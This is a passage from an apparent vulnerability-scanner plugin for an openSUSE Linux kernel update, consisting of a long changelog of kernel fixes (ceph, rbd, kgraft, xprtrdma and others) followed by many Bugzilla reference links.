(Fate#318586).\n\n - ceph: invalidate dirty pages after forced umount\n (Fate#318586).\n\n - ceph: keep i_snap_realm while there are writers\n (Fate#318586).\n\n - ceph: kstrdup() memory handling (Fate#318586).\n\n - ceph: let MDS adjust readdir 'frag' (Fate#318586).\n\n - ceph: make ceph_forget_all_cached_acls() static inline\n (Fate#318586).\n\n - ceph: make fsync() wait unsafe requests that\n created/modified inode (Fate#318586).\n\n - ceph: make sure syncfs flushes all cap snaps\n (Fate#318586).\n\n - ceph: make sure write caps are registered with auth MDS\n (Fate#318586).\n\n - ceph: match wait_for_completion_timeout return type\n (Fate#318586).\n\n - ceph: message versioning fixes (Fate#318586).\n\n - ceph: move ceph_find_inode() outside the s_mutex\n (Fate#318586).\n\n - ceph: move spinlocking into ceph_encode_locks_to_buffer\n and ceph_count_locks (Fate#318586).\n\n - ceph: no need to get parent inode in ceph_open\n (Fate#318586).\n\n - ceph: parse inline data in MClientReply and MClientCaps\n (Fate#318586).\n\n - ceph: pre-allocate ceph_cap struct for ceph_add_cap()\n (Fate#318586).\n\n - ceph: pre-allocate data structure that tracks caps\n flushing (Fate#318586).\n\n - ceph: preallocate buffer for readdir reply\n (Fate#318586).\n\n - ceph: print inode number for LOOKUPINO request\n (Fate#318586).\n\n - ceph: properly apply umask when ACL is enabled\n (Fate#318586).\n\n - ceph: properly handle XATTR_CREATE and XATTR_REPLACE\n (Fate#318586).\n\n - ceph: properly mark empty directory as complete\n (Fate#318586).\n\n - ceph: properly release page upon error (Fate#318586).\n\n - ceph: properly zero data pages for file holes\n (Fate#318586).\n\n - ceph: provide separate (inode,file)_operations for\n snapdir (Fate#318586).\n\n - ceph: queue cap release in __ceph_remove_cap()\n (Fate#318586).\n\n - ceph: queue vmtruncate if necessary when handing cap\n grant/revoke (Fate#318586).\n\n - ceph: ratelimit warn messages for MDS closes session\n (Fate#318586).\n\n - ceph: re-send AIO write request when getting -EOLDSNAP\n error (Fate#318586).\n\n - ceph: re-send flushing caps (which are revoked) in\n reconnect stage (Fate#318586).\n\n - ceph: re-send requests when MDS enters reconnecting\n stage (Fate#318586).\n\n - ceph: refactor readpage_nounlock() to make the logic\n clearer (Fate#318586).\n\n - ceph: remember subtree root dirfrag's auth MDS\n (Fate#318586).\n\n - ceph: remove exported caps when handling cap import\n message (Fate#318586).\n\n - ceph: remove outdated frag information (Fate#318586).\n\n - ceph: remove redundant code for max file size\n verification (Fate#318586).\n\n - ceph: remove redundant declaration (Fate#318586).\n\n - ceph: remove redundant memset(0) (Fate#318586).\n\n - ceph: remove redundant test of head->safe and silence\n static analysis warnings (Fate#318586).\n\n - ceph: remove the useless judgement (Fate#318586).\n\n - ceph: remove unused functions in ceph_frag.h\n (Fate#318586).\n\n - ceph: remove unused stringification macros\n (Fate#318586).\n\n - ceph: remove useless ACL check (Fate#318586).\n\n - ceph: remove xattr when null value is given to\n setxattr() (Fate#318586).\n\n - ceph: rename snapshot support (Fate#318586).\n\n - ceph: replace comma with a semicolon (Fate#318586).\n\n - ceph: request xattrs if xattr_version is zero\n (Fate#318586).\n\n - ceph: reserve caps for file layout/lock MDS requests\n (Fate#318586).\n\n - ceph: reset r_resend_mds after receiving -ESTALE\n (Fate#318586).\n\n - ceph: return error for traceless reply race\n (Fate#318586).\n\n - ceph: rework dcache readdir (Fate#318586).\n\n - ceph: send TID of the oldest pending caps flush to MDS\n (Fate#318586).\n\n - ceph: send client metadata to MDS (Fate#318586).\n\n - ceph: set caps count after composing cap reconnect\n message (Fate#318586).\n\n - ceph: set i_head_snapc when getting CEPH_CAP_FILE_WR\n reference (Fate#318586).\n\n - ceph: set mds_wanted when MDS reply changes a cap to\n auth cap (Fate#318586).\n\n - ceph: show nocephx_require_signatures and notcp_nodelay\n options (Fate#318586).\n\n - ceph: show non-default options only (Fate#318586).\n\n - ceph: simplify ceph_fh_to_dentry() (Fate#318586).\n\n - ceph: simplify two mount_timeout sites (Fate#318586).\n\n - ceph: skip invalid dentry during dcache readdir\n (Fate#318586).\n\n - ceph: support inline data feature (Fate#318586).\n\n - ceph: switch some GFP_NOFS memory allocation to\n GFP_KERNEL (Fate#318586).\n\n - ceph: sync read inline data (Fate#318586).\n\n - ceph: take snap_rwsem when accessing snap realm's\n cached_context (Fate#318586).\n\n - ceph: track pending caps flushing accurately\n (Fate#318586).\n\n - ceph: track pending caps flushing globally\n (Fate#318586).\n\n - ceph: trim unused inodes before reconnecting to\n recovering MDS (Fate#318586).\n\n - ceph: trivial comment fix (Fate#318586).\n\n - ceph: update i_max_size even if inode version does not\n change (Fate#318586).\n\n - ceph: update inode fields according to issued caps\n (Fate#318586).\n\n - ceph: use %zu for len in ceph_fill_inline_data()\n (Fate#318586).\n\n - ceph: use ceph_seq_cmp() to compare migrate_seq\n (Fate#318586).\n\n - ceph: use empty snap context for uninline_data and\n get_pool_perm (Fate#318586).\n\n - ceph: use fl->fl_file as owner identifier of flock and\n posix lock (Fate#318586).\n\n - ceph: use fl->fl_type to decide flock operation\n (Fate#318586).\n\n - ceph: use fpos_cmp() to compare dentry positions\n (Fate#318586).\n\n - ceph: use getattr request to fetch inline data\n (Fate#318586).\n\n - ceph: use i_size_(read,write) to get/set i_size\n (Fate#318586).\n\n - ceph: use msecs_to_jiffies for time conversion\n (Fate#318586).\n\n - ceph: use pagelist to present MDS request data\n (Fate#318586).\n\n - ceph: use truncate_pagecache() instead of\n truncate_inode_pages() (Fate#318586).\n\n - ceph_sync_(,direct_)write: fix an oops on\n ceph_osdc_new_request() failure (Fate#318586).\n\n - client: include kernel version in client metadata\n (Fate#318586).\n\n - cpuset: Fix potential deadlock w/ set_mems_allowed\n (bsc#960857, bsc#974646).\n\n - crush: add chooseleaf_stable tunable (Fate#318586).\n\n - crush: decode and initialize chooseleaf_stable\n (Fate#318586).\n\n - crush: ensure bucket id is valid before indexing buckets\n array (Fate#318586).\n\n - crush: ensure take bucket value is valid (Fate#318586).\n\n - crush: fix crash from invalid 'take' argument\n (Fate#318586).\n\n - crush: sync up with userspace (Fate#318586).\n\n - crypto: testmgr - allow rfc3686 aes-ctr variants in fips\n mode (bsc#958390).\n\n - crypto: testmgr - mark authenticated ctr(aes) also as\n FIPS able (bsc#958390).\n\n - dasd: fix hanging system after LCU changes (bnc#968497,\n LTC#136671).\n\n - drm/core: Preserve the framebuffer after removing it\n (bsc#968812).\n\n - drm/i915: do not warn if backlight unexpectedly enabled\n (boo#972068).\n\n - drm/i915: set backlight duty cycle after backlight\n enable for gen4 (boo#972780).\n\n - drm/radeon: fix-up some float to fixed conversion\n thinkos (bsc#968813).\n\n - drm/radeon: use HDP_MEM_COHERENCY_FLUSH_CNTL for sdma as\n well (bsc#968813).\n\n - ext4: Fix softlockups in SEEK_HOLE and SEEK_DATA\n implementations (bsc#942262).\n\n - ext4: fix races between page faults and hole punching\n (bsc#972174).\n\n - ext4: fix races of writeback with punch hole and zero\n range (bsc#972174).\n\n - fs, seq_file: fallback to vmalloc instead of oom kill\n processes (bnc#968687).\n\n - fs, seqfile: always allow oom killer (bnc#968687).\n\n - fs/ceph/debugfs.c: replace seq_printf by seq_puts\n (Fate#318586).\n\n - fs/ceph: replace pr_warning by pr_warn (Fate#318586).\n\n - fs/pipe.c: skip file_update_time on frozen fs\n (bsc#975488).\n\n - ibmvscsi: Remove unsupported host config MAD\n (bsc#973556).\n\n - iommu/vt-d: Improve fault handler error messages\n (bsc#975772).\n\n - iommu/vt-d: Ratelimit fault handler (bsc#975772).\n\n - ipv6: make fib6 serial number per namespace\n (bsc#965319).\n\n - ipv6: per netns FIB garbage collection (bsc#965319).\n\n - ipv6: per netns fib6 walkers (bsc#965319).\n\n - ipv6: replace global gc_args with local variable\n (bsc#965319).\n\n - kABI: kgr: fix subtle race with kgr_module_init(), going\n notifier and kgr_modify_kernel().\n\n - kABI: protect function file_open_root.\n\n - kABI: protect include in evm.\n\n - kABI: protect struct user_struct.\n\n - kabi fix for patches.fixes/reduce-m_start-cost\n (bsc#966573).\n\n - kabi/severities: Allow changes in zpci_* symbols\n (bsc#974692)\n\n - kabi/severities: Whitelist libceph and rbd (bsc#964727).\n\n - kabi/severities: Whitelist libceph and rbd\n (fate#318586).\n\n - kabi: kgr, add reserved fields (fate#313296).\n\n - kabi: protect struct fc_rport_priv (bsc#953233,\n bsc#962846).\n\n - kabi: protect struct netns_ipv6 after FIB6 GC series\n (bsc#965319).\n\n - kgr: add TAINT_KGRAFT (fate#313296).\n\n - kgr: add kgraft annotation to hwrng kthread\n (fate#313296).\n\n - kgr: add kgraft annotations to kthreads'\n wait_event_freezable() API calls (fate#313296).\n\n - kgr: add objname to kgr_patch_fun struct (fate#313296).\n\n - kgr: add sympos and objname to error and debug messages\n (fate#313296).\n\n - kgr: add sympos as disambiguator field to kgr_patch_fun\n structure (fate#313296).\n\n - kgr: add sympos to sysfs (fate#313296).\n\n - kgr: call kgr_init_ftrace_ops() only for loaded objects\n (fate#313296).\n\n - kgr: change to kallsyms_on_each_symbol iterator\n (fate#313296).\n\n - kgr: define pr_fmt and modify all pr_* messages\n (fate#313296).\n\n - kgr: do not print error for !abort_if_missing symbols\n (bnc#943989).\n\n - kgr: do not return and print an error only if the object\n is not loaded (fate#313296).\n\n - kgr: do not use WQ_MEM_RECLAIM workqueue (bnc#963572).\n\n - kgr: fix an asymmetric dealing with delayed module\n loading (fate#313296).\n\n - kgr: fix redirection on s390x arch (bsc#903279).\n\n - kgr: fix reversion of a patch already reverted by a\n replace_all patch (fate#313296).\n\n - kgr: fix subtle race with kgr_module_init(), going\n notifier and kgr_modify_kernel() (fate#313296).\n\n - kgr: handle btrfs kthreads (fate#313296 bnc#889207).\n\n - kgr: kmemleak, really mark the kthread safe after an\n interrupt (fate#313296).\n\n - kgr: log when modifying kernel (fate#317827).\n\n - kgr: mark kernel unsupported upon patch revert\n (fate#313296).\n\n - kgr: mark some more missed kthreads (bnc#962336).\n\n - kgr: remove abort_if_missing flag (fate#313296).\n\n - kgr: usb/storage: do not emit thread awakened\n (bnc#899908).\n\n - kgraft/gfs2: Do not block livepatching in the log daemon\n for too long (fate#313296).\n\n - kgraft/xen: Do not block livepatching in the XEN blkif\n kthread (fate#313296).\n\n - libceph: Avoid holding the zero page on\n ceph_msgr_slab_init errors (Fate#318586).\n\n - libceph: Fix ceph_tcp_sendpage()'s more boolean usage\n (Fate#318586).\n\n - libceph: MOSDOpReply v7 encoding (Fate#318586).\n\n - libceph: Remove spurious kunmap() of the zero page\n (Fate#318586).\n\n - libceph: a couple tweaks for wait loops (Fate#318586).\n\n - libceph: add nocephx_sign_messages option (Fate#318586).\n\n - libceph: advertise support for TUNABLES5 (Fate#318586).\n\n - libceph: advertise support for keepalive2 (Fate#318586).\n\n - libceph: allow setting osd_req_op's flags (Fate#318586).\n\n - libceph: check data_len in ->alloc_msg() (Fate#318586).\n\n - libceph: clear messenger auth_retry flag if we fault\n (Fate#318586).\n\n - libceph: clear msg->con in ceph_msg_release() only\n (Fate#318586).\n\n - libceph: do not access invalid memory in keepalive2 path\n (Fate#318586).\n\n - libceph: do not spam dmesg with stray reply warnings\n (Fate#318586).\n\n - libceph: drop authorizer check from cephx msg signing\n routines (Fate#318586).\n\n - libceph: evaluate osd_req_op_data() arguments only once\n (Fate#318586).\n\n - libceph: fix authorizer invalidation, take 2\n (Fate#318586).\n\n - libceph: fix ceph_msg_revoke() (Fate#318586).\n\n - libceph: fix wrong name 'Ceph filesystem for Linux'\n (Fate#318586).\n\n - libceph: handle writefull for OSD op extent init\n (bsc#980706).\n\n - libceph: introduce ceph_x_authorizer_cleanup()\n (Fate#318586).\n\n - libceph: invalidate AUTH in addition to a service ticket\n (Fate#318586).\n\n - libceph: kill off ceph_x_ticket_handler::validity\n (Fate#318586).\n\n - libceph: move ceph_file_layout helpers to ceph_fs.h\n (Fate#318586).\n\n - libceph: msg signing callouts do not need con argument\n (Fate#318586).\n\n - libceph: nuke time_sub() (Fate#318586).\n\n - libceph: properly release STAT request's raw_data_in\n (Fate#318586).\n\n - libceph: remove con argument in handle_reply()\n (Fate#318586).\n\n - libceph: remove outdated comment (Fate#318586).\n\n - libceph: remove the unused macro AES_KEY_SIZE\n (Fate#318586).\n\n - libceph: rename con_work() to ceph_con_workfn()\n (Fate#318586).\n\n - libceph: set 'exists' flag for newly up osd\n (Fate#318586).\n\n - libceph: stop duplicating client fields in messenger\n (Fate#318586).\n\n - libceph: store timeouts in jiffies, verify user input\n (Fate#318586).\n\n - libceph: treat sockaddr_storage with uninitialized\n family as blank (Fate#318586).\n\n - libceph: use keepalive2 to verify the mon session is\n alive (Fate#318586).\n\n - libceph: use list_for_each_entry_safe (Fate#318586).\n\n - libceph: use list_next_entry instead of list_entry_next\n (Fate#318586).\n\n - libceph: use local variable cursor instead of\n msg->cursor (Fate#318586).\n\n - libceph: use the right footer size when skipping a\n message (Fate#318586).\n\n - libfc: replace 'rp_mutex' with 'rp_lock' (bsc#953233,\n bsc#962846).\n\n - mds: check cap ID when handling cap export message\n (Fate#318586).\n\n - mmc: Allow forward compatibility for eMMC (bnc#966054).\n\n - mmc: sdhci: Allow for irq being shared (bnc#977582).\n\n - mpt3sas: Fix use sas_is_tlr_enabled API before enabling\n MPI2_SCSIIO_CONTROL_TLR_ON flag (bsc#967640).\n\n - nfs-rdma: Fix for FMR leaks (bsc#908151).\n\n - nfs: fix high load average due to callback thread\n sleeping (bsc#971170).\n\n - nvme: fix max_segments integer truncation (bsc#976471).\n\n - ocfs2: do not set fs read-only if rec[0] is empty while\n committing truncate (bnc#971947).\n\n - ocfs2: extend enough credits for freeing one truncate\n record while replaying truncate records (bnc#971947).\n\n - ocfs2: extend transaction for\n ocfs2_remove_rightmost_path() and\n ocfs2_update_edge_lengths() before to avoid\n inconsistency between inode and et (bnc#971947).\n\n - pipe: limit the per-user amount of pages allocated in\n pipes (bsc#970948).\n\n - powerpc/book3s64: Fix branching to OOL handlers in\n relocatable kernel (bsc@976821).\n\n - powerpc/book3s64: Remove __end_handlers marker\n (bsc#976821).\n\n - rbd: bump queue_max_segments (Fate#318586).\n\n - rbd: delete an unnecessary check before\n rbd_dev_destroy() (Fate#318586).\n\n - rbd: do not free rbd_dev outside of the release callback\n (Fate#318586).\n\n - rbd: do not put snap_context twice in rbd_queue_workfn()\n (Fate#318586).\n\n - rbd: drop null test before destroy functions\n (Fate#318586).\n\n - rbd: handle OBJ_REQUEST_SG types for copyup\n (bsc#983394).\n\n - rbd: plug rbd_dev->header.object_prefix memory leak\n (Fate#318586).\n\n - rbd: rbd_wq comment is obsolete (Fate#318586).\n\n - rbd: remove duplicate calls to rbd_dev_mapping_clear()\n (Fate#318586).\n\n - rbd: report unsupported features to syslog (bsc#979169).\n\n - rbd: return -ENOMEM instead of pool id if\n rbd_dev_create() fails (Fate#318586).\n\n - rbd: set device_type::release instead of device::release\n (Fate#318586).\n\n - rbd: set max_sectors explicitly (Fate#318586).\n\n - rbd: store rbd_options in rbd_device (Fate#318586).\n\n - rbd: terminate rbd_opts_tokens with Opt_err\n (Fate#318586).\n\n - rbd: timeout watch teardown on unmap with mount_timeout\n (Fate#318586).\n\n - rbd: use GFP_NOIO consistently for request allocations\n (bsc#971159).\n\n - rbd: use writefull op for object size writes\n (Fate#318586).\n\n - reduce m_start() cost.. (bsc#966573).\n\n - rpm/modprobe-xen.conf: Revert comment change to allow\n parallel install (bsc#957986). This reverts commit\n 6c6d86d3cdc26f7746fe4ba2bef8859b5aeb346c.\n\n - s390/compat: correct restore of high gprs on signal\n return (bnc#968497, LTC#137571).\n\n - s390/pageattr: do a single TLB flush for\n change_page_attr (bsc#940413).\n\n - s390/pci: add extra padding to function measurement\n block (bnc#974692, LTC#139445).\n\n - s390/pci: enforce fmb page boundary rule (bnc#974692,\n LTC#139445).\n\n - s390/pci: extract software counters from fmb\n (bnc#974692, LTC#139445).\n\n - s390/pci: remove pdev pointer from arch data\n (bnc#974692, LTC#139444).\n\n - s390/pci_dma: fix DMA table corruption with > 4 TB main\n memory (bnc#974692, LTC#139401).\n\n - s390/pci_dma: handle dma table failures (bnc#974692,\n LTC#139442).\n\n - s390/pci_dma: improve debugging of errors during dma map\n (bnc#974692, LTC#139442).\n\n - s390/pci_dma: unify label of invalid translation table\n entries (bnc#974692, LTC#139442).\n\n - s390/zcrypt: HWRNG registration cause kernel panic on\n CEX hotplug (bnc#968497, LTC#138409).\n\n - scsi-bnx2fc-handle_scsi_retry_delay\n\n - scsi-bnx2fc-soft_lockup_when_rmmod\n\n - scsi: Add intermediate STARGET_REMOVE state to\n scsi_target_state (bsc#970609).\n\n - scsi: Avoid crashing if device uses DIX but adapter does\n not support it (bsc#969016).\n\n - sd: get disk reference in sd_check_events()\n (bnc#897662).\n\n - supported.conf :\n\n - supported.conf: Add bridge.ko for OpenStack (bsc#971600)\n\n - supported.conf: add pci-hyperv\n\n - supported.conf:Add\n drivers/infiniband/hw/ocrdma/ocrdma.ko to supported.conf\n (bsc#964461)\n\n - svcrdma: Fence LOCAL_INV work requests (bsc#908151).\n\n - svcrdma: advertise the correct max payload (bsc#908151).\n\n - svcrdma: fix offset calculation for non-page aligned sge\n entries (bsc#908151).\n\n - svcrdma: fix printk when memory allocation fails\n (bsc#908151).\n\n - svcrdma: refactor marshalling logic (bsc#908151).\n\n - svcrdma: send_write() must not overflow the device's max\n sge (bsc#908151).\n\n - target/rbd: do not put snap_context twice (bsc#981143).\n\n - target/rbd: remove caw_mutex usage (bsc#981143).\n\n - target: Drop incorrect ABORT_TASK put for completed\n commands (bsc#962872).\n\n - target: Fix LUN_RESET active I/O handling for ACK_KREF\n (bsc#962872).\n\n - target: Fix LUN_RESET active TMR descriptor handling\n (bsc#962872).\n\n - target: Fix TAS handling for multi-session se_node_acls\n (bsc#962872).\n\n - target: Fix race with SCF_SEND_DELAYED_TAS handling\n (bsc#962872).\n\n - target: Fix remote-port TMR ABORT + se_cmd fabric stop\n (bsc#962872).\n\n - tcp: convert cached rtt from usec to jiffies when\n feeding initial rto (bsc#937086).\n\n - vgaarb: Add more context to error messages (bsc#976868).\n\n - xen/acpi: Disable ACPI table override when UEFI Secure\n Boot is enabled (bsc#970604).\n\n - xen: Linux 3.12.58.\n\n - xprtrdma: Allocate missing pagelist (bsc#908151).\n\n - xprtrdma: Avoid deadlock when credit window is reset\n (bsc#908151).\n\n - xprtrdma: Disconnect on registration failure\n (bsc#908151).\n\n - xprtrdma: Ensure ia->ri_id->qp is not NULL when\n reconnecting (bsc#908151).\n\n - xprtrdma: Fall back to MTHCAFMR when FRMR is not\n supported (bsc#908151).\n\n - xprtrdma: Limit work done by completion handler\n (bsc#908151).\n\n - xprtrdma: Make rpcrdma_ep_destroy() return void\n (bsc#908151).\n\n - xprtrdma: RPC/RDMA must invoke xprt_wake_pending_tasks()\n in process context (bsc#908151).\n\n - xprtrdma: Reduce the number of hardway buffer\n allocations (bsc#908151).\n\n - xprtrdma: Remove BOUNCEBUFFERS memory registration mode\n (bsc#908151).\n\n - xprtrdma: Remove BUG_ON() call sites (bsc#908151).\n\n - xprtrdma: Remove MEMWINDOWS registration modes\n (bsc#908151).\n\n - xprtrdma: Remove REGISTER memory registration mode\n (bsc#908151).\n\n - xprtrdma: Remove Tavor MTU setting (bsc#908151).\n\n - xprtrdma: Reset connection timeout after successful\n reconnect (bsc#908151).\n\n - xprtrdma: Simplify rpcrdma_deregister_external()\n synopsis (bsc#908151).\n\n - xprtrdma: Split the completion queue (bsc#908151).\n\n - xprtrdma: Use macros for reconnection timeout constants\n (bsc#908151).\n\n - xprtrdma: mind the device's max fast register page list\n depth (bsc#908151).\n\n - xprtrdma: mount reports 'Invalid mount option' if memreg\n mode not supported (bsc#908151).\n\n - xprtrmda: Reduce calls to ib_poll_cq() in completion\n handlers (bsc#908151).\n\n - xprtrmda: Reduce lock contention in completion handlers\n (bsc#908151).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=889207\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=897662\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=899908\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=903279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=908151\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=928547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=931448\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937086\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=940413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=942262\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=943989\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=944309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=945345\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=951844\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=953233\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=957805\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=957986\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=959514\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=960857\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=961512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=962336\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=962846\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=962872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=963572\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=964461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=964727\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966054\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=966573\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=967640\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968497\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968812\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=968813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=969016\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970504\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970604\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970609\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970911\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970955\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970958\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=970970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971049\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971628\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971770\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=971947\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=972003\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=972068\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=972124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=972174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=972780\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=972844\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=972891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=972951\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=973855\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974406\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974418\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=974692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=975371\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=975488\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=975772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=975945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=976471\"\n );\n script_set_attribute(\n 